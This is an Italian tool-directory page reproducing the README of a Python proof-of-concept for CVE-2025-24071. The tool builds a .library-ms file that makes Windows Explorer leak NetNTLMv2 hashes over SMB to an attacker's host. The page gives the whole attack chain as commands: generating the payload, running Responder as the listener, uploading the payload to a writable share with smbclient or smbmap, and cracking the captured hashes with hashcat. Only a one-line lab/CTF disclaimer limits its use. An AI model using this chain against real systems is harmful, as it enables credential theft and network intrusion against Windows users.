Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-CVE-2025-24071 — PoC in Python per CVE-2025-24071 che crea un file .library-ms per indurre Windows Explorer a divulgare hash NetNTLMv2 tramite SMB, consentendone la cattura e il cracking. | Kitploit
Strumenti/GitHubGitHub/daemon-404/poc-cve-2025-24071
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSicurezza di ReteCTFPenetration TestingRed TeamingLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
daemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

PoC in Python per CVE-2025-24071 che crea un file .library-ms per indurre Windows Explorer a divulgare hash NetNTLMv2 tramite SMB, consentendone la cattura e il cracking.

Vedi Repository
13h 56m faNon ancora revisionato

❀ coerce-library

CVE-2025-24071 — coercizione NTLM tramite .library-ms (metodo SMB / TAR)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ Cosa fa

Chiede il tuo IP di attacco e un nome file, scrive un .library-ms che punta a \\<IP>\share, e lo impacchetta in exploit.tar. Quando Explorer esplora la cartella in cui finisce il .library-ms sciolto, risolve automaticamente quel percorso UNC e fa trapelare l'NTLMv2 dell'account verso il tuo listener — senza bisogno di alcun click.

⚠️ È il .library-ms sciolto che fa scattare tutto — non il .tar. Un .tar presente sulla share è inerte; Explorer non analizza i tarball. Devi far arrivare il .library-ms stesso sulla share come file sciolto. Come farlo dipende dallo strumento (vedi sotto).


❀ Eseguilo

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Poi

1) Metti in ascolto

root@kitploit:~
sudo responder -I tun0

2) Porta il .library-ms su una share scrivibile

smbclient — carica il .tar, estrailo lato server con tar x (deposita il .library-ms sciolto accanto ad esso):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — non ha una fase di estrazione, quindi carica direttamente il .library-ms sciolto (caricare qui il .tar non serve a nulla — non può decomprimerlo):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Verifica che sia arrivato sciolto sulla share:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Cracca l'NTLMv2 catturato

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ solo per penetration testing autorizzato / CTF / uso in laboratorio ☧

Scarica lo strumento